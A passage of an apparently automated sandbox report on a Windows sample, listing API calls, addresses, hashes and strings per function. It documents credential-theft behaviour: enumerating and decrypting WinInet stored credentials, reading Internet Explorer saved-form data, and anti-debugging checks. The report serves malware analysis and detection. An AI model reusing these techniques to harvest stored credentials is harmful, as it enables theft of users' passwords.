                    • API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
                    • String ID: =="$2}GFU][\Uaa~$B$n'
                    • API String ID: 604483397-4222534369
                    • Opcode ID: d354a35def5997a6f0156d64622d00e4d6aaf0f2cfa2baa623f6355808a2a2b0
                    • Instruction ID: e964633260066af86b69287bc051fd38dc850982c8e0325e30202a6175a52b5f
                    • Opcode Fuzzy Hash: d354a35def5997a6f0156d64622d00e4d6aaf0f2cfa2baa623f6355808a2a2b0
                    • Instruction Fuzzy Hash: F8E1B130D042ACDEDB15DFA5D991BEDBBB0AF19304F5041AEE44977242DB741A88CF2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • lstrlenW.KERNEL32(?), ref: 004290BD
                    • lstrlenW.KERNEL32(00000002), ref: 004290CE
                    • CredEnumerateW.ADVAPI32(Microsoft_WinInet_*,00000000,?,?), ref: 004290F7
                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042913D
                    • LocalFree.KERNEL32(?), ref: 00429167
                    • CredFree.ADVAPI32(?), ref: 00429180
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CredFreelstrlen$CryptDataEnumerateLocalUnprotect
                    • String ID: J$Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
                    • API String ID: 186292201-3120203912
                    • Opcode ID: 3d6e05453ca36ef28b1a1fb20acb275e22e23f72648fef2811ac9892053820c1
                    • Instruction ID: 46da6d1e1e4c1d9fa259467267a865b5dbdaaeac394ed03f94105f50f9ff9f91
                    • Opcode Fuzzy Hash: 3d6e05453ca36ef28b1a1fb20acb275e22e23f72648fef2811ac9892053820c1
                    • Instruction Fuzzy Hash: 86315975E00229ABDB20CF96DC44DEFBBB8FF84740F54416AE901E3240E7749A05DBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • wsprintfA.USER32 ref: 004354F8
                    • lstrlenW.KERNEL32(00000010), ref: 00435502
                    • lstrlenA.KERNEL32(?), ref: 0043553F
                    • lstrlenA.KERNEL32(?), ref: 00435576
                    • lstrlenA.KERNEL32(7B741A18), ref: 004355BA
                    • lstrlenW.KERNEL32(00000000), ref: 004355F7
                      • Part of subcall function 00435E7F: lstrlenA.KERNEL32(?,?,74E069A0,?,?), ref: 00435EB0
                      • Part of subcall function 00435E7F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0,?,?), ref: 00435ECF
                      • Part of subcall function 00435E7F: lstrcpyA.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0,?,?), ref: 00435EF2
                      • Part of subcall function 00435E7F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,74E069A0), ref: 00435F1E
                    • lstrlenA.KERNEL32(00004169), ref: 00435634
                      • Part of subcall function 00435F3C: lstrlenA.KERNEL32(?,?,?,?,?,?,?,00428B6A,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435F61
                      • Part of subcall function 00435F3C: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,?,?,00428B6A,00000001,?,ftp://,00000006,?,Microsoft_WinInet_,00000012), ref: 00435F88
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$ByteCharMultiWidelstrcpy$wsprintf
                    • String ID: +Ad$iA$iA
                    • API String ID: 130686893-3715399877
                    • Opcode ID: 0272228fbd7f5ad80ad8a7eade8451fcc5e475fb4778d745f88251d1b588bb5e
                    • Instruction ID: d2ec03cfa7f90dffe389adf4d9b83abec7bd8b7b27b7b22094a6bf51b2e2e627
                    • Opcode Fuzzy Hash: 0272228fbd7f5ad80ad8a7eade8451fcc5e475fb4778d745f88251d1b588bb5e
                    • Instruction Fuzzy Hash: AF8118309082C8AADF05CFB9D455AEEBFF1AF1D300F14909EF485AB252D6388645C769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0041DD17: SetFilePointer.KERNEL32(?,?,00000000,?), ref: 0041DD4A
                    • _strcat.LIBCMT ref: 0041EBC1
                    • _strcat.LIBCMT ref: 0041EC3C
                    • SystemTimeToFileTime.KERNEL32(?,000007BC), ref: 0041ED91
                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0041EDB1
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileTime$_strcat$LocalPointerSystem
                    • String ID: /../$/..\$\../$\..\
                    • API String ID: 3418985325-3885502717
                    • Opcode ID: 9387db5073cd8404cd268d813a8e74c48ac0cb7fa5b9ac1158c2120cf5236bf3
                    • Instruction ID: ba9cba0db156075782e8858f275b67d869004db28f1c742aedc9c47af07deda8
                    • Opcode Fuzzy Hash: 9387db5073cd8404cd268d813a8e74c48ac0cb7fa5b9ac1158c2120cf5236bf3
                    • Instruction Fuzzy Hash: FDE1D3759087418FD315CF26C4816D7BBE0AF89314F148A2FE899C7341D739E986CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00410FA1
                    • GetProcAddress.KERNEL32(?,?), ref: 00410FEC
                    • GetProcAddress.KERNEL32(?,?), ref: 0041101E
                    • GetProcAddress.KERNEL32(?,?), ref: 0041105D
                    • GetProcAddress.KERNEL32(?,?), ref: 00411095
                    • GetProcAddress.KERNEL32(?,?), ref: 004110CA
                    • GetProcAddress.KERNEL32(?,?), ref: 004110FB
                    • GetProcAddress.KERNEL32(?,E0FDFF73), ref: 0041113D
                    • wsprintfA.USER32 ref: 004111A1
                      • Part of subcall function 00413BEF: __EH_prolog.LIBCMT ref: 00413BF4
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                      • Part of subcall function 0041162F: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041165D
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$H_prolog$DeallocateIos_base_dtorstd::ios_base::_wsprintf
                    • String ID:
                    • API String ID: 3613913591-0
                    • Opcode ID: 4390f5a07a2bd3a7eee0ff5498a593cec8a8b56d24064274bdfd79062cafc080
                    • Instruction ID: 758ba7fdaccef8edf01de24b5b74b8cbf72a257d6a414aa4bea21b6aeea485d1
                    • Opcode Fuzzy Hash: 4390f5a07a2bd3a7eee0ff5498a593cec8a8b56d24064274bdfd79062cafc080
                    • Instruction Fuzzy Hash: C4122330D0429C9BDF11DFB8D9406EEBBB0BF69304F1091AEE544B7262DB740A89CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A1CF: GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                      • Part of subcall function 0045A1CF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                    • GetACP.KERNEL32(?,?,?,?,?,?,00455E83,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00462F25
                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00455E83,?,?,?,00000055,?,-00000050,?,?), ref: 00462F50
                    • _wcschr.LIBVCRUNTIME ref: 00462FE4
                    • _wcschr.LIBVCRUNTIME ref: 00462FF2
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 004630B3
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                    • String ID: utf8$|GG
                    • API String ID: 4147378913-4084338441
                    • Opcode ID: 47e3761b47bb7842e3629306377efccd91bf543341982b126fd25e1b60e97c39
                    • Instruction ID: 42cc7082675b3301b59f324c5bd175515f8ba15f067a0340a9b873ebd6ba17f8
                    • Opcode Fuzzy Hash: 47e3761b47bb7842e3629306377efccd91bf543341982b126fd25e1b60e97c39
                    • Instruction Fuzzy Hash: C871F471600702AAD729AF25CD42BAB73A8EF04705F14442FF90597282FBBCDA45966B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A1CF: GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                      • Part of subcall function 0045A1CF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                      • Part of subcall function 0045A1CF: _free.LIBCMT ref: 0045A231
                      • Part of subcall function 0045A1CF: _free.LIBCMT ref: 0045A267
                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 004638D1
                    • IsValidCodePage.KERNEL32(00000000), ref: 0046391A
                    • IsValidLocale.KERNEL32(?,00000001), ref: 00463929
                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00463971
                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00463990
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                    • String ID: |GG
                    • API String ID: 949163717-4113188311
                    • Opcode ID: 8293694dfaad0731f9dc1728cc7cc249046cccc7a0904f4c8631b54ac7bc6bf8
                    • Instruction ID: 7b075af0e1f3b883ebceb8b8bcf3ac014785394346bcbcdf59012bb3824b76cc
                    • Opcode Fuzzy Hash: 8293694dfaad0731f9dc1728cc7cc249046cccc7a0904f4c8631b54ac7bc6bf8
                    • Instruction Fuzzy Hash: EF517471A00255ABEB10EFA5CC41AEB77F8AF05702F14446AF901E7251F778DA04DB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryA.KERNEL32(?), ref: 00434E3F
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00434E7A
                    • FreeLibrary.KERNEL32(00000000), ref: 00434EAE
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Library$AddressFreeLoadProc
                    • String ID: 2bAF$]@WQ$n{ty
                    • API String ID: 145871493-2023198426
                    • Opcode ID: d42642a94ddbf582ce90afb358b753f937b6f796c13d6721f85c4935e2183fbd
                    • Instruction ID: 66faf69fcd4e163ae5e383dc3bc76a0fc325b275116ca891f1668fcab282a65c
                    • Opcode Fuzzy Hash: d42642a94ddbf582ce90afb358b753f937b6f796c13d6721f85c4935e2183fbd
                    • Instruction Fuzzy Hash: DC21F630A042499FDB01CFA998418EFFBBAFE9A304F14546DE841A7241DB749E05C769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 004378F2
                    • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?), ref: 00437992
                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 004379E0
                    • RegCloseKey.ADVAPI32(?), ref: 004379E9
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseDeallocateH_prologOpenQueryValue
                    • String ID: .
                    • API String ID: 2130659939-4148933962
                    • Opcode ID: 6a96e084f5345863b5b2352e82a2953bf364d17b60e4ed1fe5cbc0816df5c4fd
                    • Instruction ID: e6a93da5d0dddd1e599897279ccf8d5efee9ba0f5de51334628491e7991f3a57
                    • Opcode Fuzzy Hash: 6a96e084f5345863b5b2352e82a2953bf364d17b60e4ed1fe5cbc0816df5c4fd
                    • Instruction Fuzzy Hash: 14D106B0D042489EEF21DFA5C890BFEBBB8AF18304F10515FD49677282D7781A49CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 00435DD4
                    • RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 00435DF3
                    • RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00435E2E
                    • RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 00435E4F
                      • Part of subcall function 00445EF8: _free.LIBCMT ref: 00445F0B
                    Strings
                    • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00435DD2
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: QueryValue$CloseOpen_free
                    • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                    • API String ID: 3744367872-680441574
                    • Opcode ID: a0a582c8bfee2c34f2c34f5bf2e611008121bb9d7ee6b2939e03348ce03c6877
                    • Instruction ID: b231dc592b3246f1444600c4c8ee4bed252f254ea0d2f855507d8241317e4857
                    • Opcode Fuzzy Hash: a0a582c8bfee2c34f2c34f5bf2e611008121bb9d7ee6b2939e03348ce03c6877
                    • Instruction Fuzzy Hash: 0B319175600619ABEF20CF55DC85BAF77B8EF08754F208026FD08A7250E779DE008BA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(?,2000000B,0046390E,00000002,00000000,?,?,?,0046390E,?,00000000), ref: 00463689
                    • GetLocaleInfoW.KERNEL32(?,20001004,0046390E,00000002,00000000,?,?,?,0046390E,?,00000000), ref: 004636B2
                    • GetACP.KERNEL32(?,?,0046390E,?,00000000), ref: 004636C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: ACP$OCP
                    • API String ID: 2299586839-711371036
                    • Opcode ID: 6d70802b8e0748aac78b8cc8b8bcb97d194cd492f334e2568a9e713431918b22
                    • Instruction ID: 26f12fdab3d7c7ffa45844b813dfb83a3ca93b537430f194767bfc0a99a1f939
                    • Opcode Fuzzy Hash: 6d70802b8e0748aac78b8cc8b8bcb97d194cd492f334e2568a9e713431918b22
                    • Instruction Fuzzy Hash: 9221C272A00180B6DB348F15C905AA7B2A6EF90F66B568426E90ADB310F776DF41C35B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CoCreateInstance.OLE32(0046ED30,00000000,00000015,0046ED50,?), ref: 004291AB
                    • StrStrIW.SHLWAPI(?,0047DB6C), ref: 004291FC
                    • CoTaskMemFree.OLE32(?), ref: 0042921A
                    • CoTaskMemFree.OLE32(?), ref: 00429228
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeTask$CreateInstance
                    • String ID: (
                    • API String ID: 2903366249-3887548279
                    • Opcode ID: 7d5e94c655667be3979e1e8fedbd8b6ef92e01f5443a8e666515123bb5cffa43
                    • Instruction ID: 5109e8e6b44d2813c87aee92a0d232a4875f8c1a44229cb3765ee013b6285d56
                    • Opcode Fuzzy Hash: 7d5e94c655667be3979e1e8fedbd8b6ef92e01f5443a8e666515123bb5cffa43
                    • Instruction Fuzzy Hash: 8421F774E00219FFDB04DF95E884D9EB7B9EF88704F5084AAE405A7260EA749D40CB29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • FindClose.KERNEL32(000000FF,?,00415450,?,7FFFFFFF,?,00000000,00415155,?,?,?,004145D7,00415155,00000000,00415155,?), ref: 0043F867
                    • FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0043F897
                    • GetLastError.KERNEL32(?,?,?,?,00415450,?,7FFFFFFF,?,00000000,00415155,?,?,?,004145D7,00415155,00000000), ref: 0043F8A4
                    • FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0043F8BE
                    • GetLastError.KERNEL32(?,?,?,?,00415450,?,7FFFFFFF,?,00000000,00415155,?,?,?,004145D7,00415155,00000000), ref: 0043F8CB
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$ErrorFileFirstLast$Close
                    • String ID:
                    • API String ID: 569926201-0
                    • Opcode ID: 6b894fbdb204cbf846239aa35b632590d8d2424d41b7f67d8321b018e83483af
                    • Instruction ID: 38a7b95dc9a23645a4718a4e9a30046f38f65371f8663844366267c5f59bbd3b
                    • Opcode Fuzzy Hash: 6b894fbdb204cbf846239aa35b632590d8d2424d41b7f67d8321b018e83483af
                    • Instruction Fuzzy Hash: 90019235400149BBCB282F67DC0CC5B3FB9EFD6721F10453AF668851A0D7718855D769
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004412DE
                    • IsDebuggerPresent.KERNEL32 ref: 004413AA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004413CA
                    • UnhandledExceptionFilter.KERNEL32(?), ref: 004413D4
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                    • String ID:
                    • API String ID: 254469556-0
                    • Opcode ID: 04665d6d43c7ac8714bac8cc9f601c9bb9303fa4e2f9adc7771d828139cffd59
                    • Instruction ID: 6cb868b1b31622d64aff2a58c3faceb2e9e6082c713637c9a94abe31f1f70b7b
                    • Opcode Fuzzy Hash: 04665d6d43c7ac8714bac8cc9f601c9bb9303fa4e2f9adc7771d828139cffd59
                    • Instruction Fuzzy Hash: 7F310975D053189BEF10DFA5D989BCDBBB8BF04305F1041EAE40DAB250EB755A858F09
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A1CF: GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                      • Part of subcall function 0045A1CF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                      • Part of subcall function 0045A1CF: _free.LIBCMT ref: 0045A231
                      • Part of subcall function 0045A1CF: _free.LIBCMT ref: 0045A267
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004632CB
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00463315
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004633DB
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale$ErrorLast_free
                    • String ID:
                    • API String ID: 3140898709-0
                    • Opcode ID: 53e453c7ba0ddf64dbc147be73cf2c4c72c241aac9d4c4bca2a911a0ab014b79
                    • Instruction ID: d8de431fd77d7e3a42ab5c7856648c25a0553a4b276bc90305d36d373cd96f94
                    • Opcode Fuzzy Hash: 53e453c7ba0ddf64dbc147be73cf2c4c72c241aac9d4c4bca2a911a0ab014b79
                    • Instruction Fuzzy Hash: 466180715002479BDB299F25CC82BAAB7A8EF04316F10407BED05C6285FB7CDA95CB5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0041FC25
                    • _strlen.LIBCMT ref: 0041FCD7
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041FCDF
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptH_prologString_strlen
                    • String ID:
                    • API String ID: 2573900957-0
                    • Opcode ID: d876a313230a741ff4752e4b8e0d6d89069382718eb39a06524170caf6f4bee5
                    • Instruction ID: 30fc563031dc390df11cbf63ba8f43ab05457e15c5d2f07d0df8c6dc27800da0
                    • Opcode Fuzzy Hash: d876a313230a741ff4752e4b8e0d6d89069382718eb39a06524170caf6f4bee5
                    • Instruction Fuzzy Hash: 2E416371D00209ABDB10DFE5D880AFEBBB9BF48754F14447EE405A3241DB788A8ACB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00437722
                    • GetTimeZoneInformation.KERNEL32(?), ref: 0043773F
                      • Part of subcall function 00413CEE: __EH_prolog.LIBCMT ref: 00413CF3
                      • Part of subcall function 004143A6: __EH_prolog.LIBCMT ref: 004143AB
                      • Part of subcall function 004143A6: std::locale::_Init.LIBCPMT ref: 004143C9
                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00437891
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
                    • String ID:
                    • API String ID: 3259846166-0
                    • Opcode ID: cac1b8ef2e3892b99b9ff9710bab06e194a04e6a37be70c6d0b7071410d40a70
                    • Instruction ID: 49212a8f76eade8df1ceb4ba9dfcc4c806aa3b33319c6a7e4e9b40765fb815e9
                    • Opcode Fuzzy Hash: cac1b8ef2e3892b99b9ff9710bab06e194a04e6a37be70c6d0b7071410d40a70
                    • Instruction Fuzzy Hash: 39417EB0D00258CBDB51DFA9C8587EEBBB5BF48304F1085AAD849B7241EB785A88CF55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0043FE4F), ref: 00446BC0
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0043FE4F), ref: 00446BCA
                    • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0043FE4F), ref: 00446BD7
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                    • String ID:
                    • API String ID: 3906539128-0
                    • Opcode ID: 0a62add7c9224d1a7727230dcc9c92a8e236b04846d8123e65f83c369a532e67
                    • Instruction ID: 38e48dfca66287e1076b4f5b8b40bbc9249928b9d9e53c97f42146288e89e7fe
                    • Opcode Fuzzy Hash: 0a62add7c9224d1a7727230dcc9c92a8e236b04846d8123e65f83c369a532e67
                    • Instruction Fuzzy Hash: 5C310574901328ABDB21DF25DC88B9DBBB8BF08314F5045EAE41CA7261E7749F858F49
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,00447698,000000FF,?,UQA,000000FF,00415155,?), ref: 004476BB
                    • TerminateProcess.KERNEL32(00000000,?,00447698,000000FF,?,UQA,000000FF,00415155,?), ref: 004476C2
                    • ExitProcess.KERNEL32 ref: 004476D4
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 192399720af7b1210aa4ee101007f75921d421d4c7c6158b90a8f2672e69e493
                    • Instruction ID: a5c9dfe17221ad18005e09e5fe09fdc01f3b7854846f984683439783104368d2
                    • Opcode Fuzzy Hash: 192399720af7b1210aa4ee101007f75921d421d4c7c6158b90a8f2672e69e493
                    • Instruction Fuzzy Hash: A8E08631005504EFEF112F5ADD1894D3F6EFB40751B050425F80886131DB79DD43CB4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,004569DE,?,20001004,00000000,00000002,?,?,00455FEB), ref: 00458D33
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoLocale
                    • String ID: \1A
                    • API String ID: 2299586839-1566668914
                    • Opcode ID: 00733acd8f7a1e63962e9f169c3f38b0f2ef3220e78299ade2cd4094e79b422a
                    • Instruction ID: 98548b9e2d8b0814a10b6843bb40ea995049b6f606f426fb7482a4ebe1a03d58
                    • Opcode Fuzzy Hash: 00733acd8f7a1e63962e9f169c3f38b0f2ef3220e78299ade2cd4094e79b422a
                    • Instruction Fuzzy Hash: 9CE0DF3500011CBBCF022F62DC09A9E3EA6FF04752F00442AFC0172262EF798824AAD9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 00436164
                    • GetLogicalDriveStringsA.KERNEL32 ref: 004361B1
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeallocateDriveH_prologLogicalStrings
                    • String ID:
                    • API String ID: 3000204024-0
                    • Opcode ID: 96e3af9f83cbfd7ab0a4f0fcec2c423001c509b49522c0e20af4edda2d34965a
                    • Instruction ID: d913792027452ddd12bf2adc4502a353d3440404426372cf0a192d27943cd21b
                    • Opcode Fuzzy Hash: 96e3af9f83cbfd7ab0a4f0fcec2c423001c509b49522c0e20af4edda2d34965a
                    • Instruction Fuzzy Hash: 57219AB1C02245AEDB10EFA9D5417EEFFF5AF19308F14405EE484A3282D7B94A04CBA6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
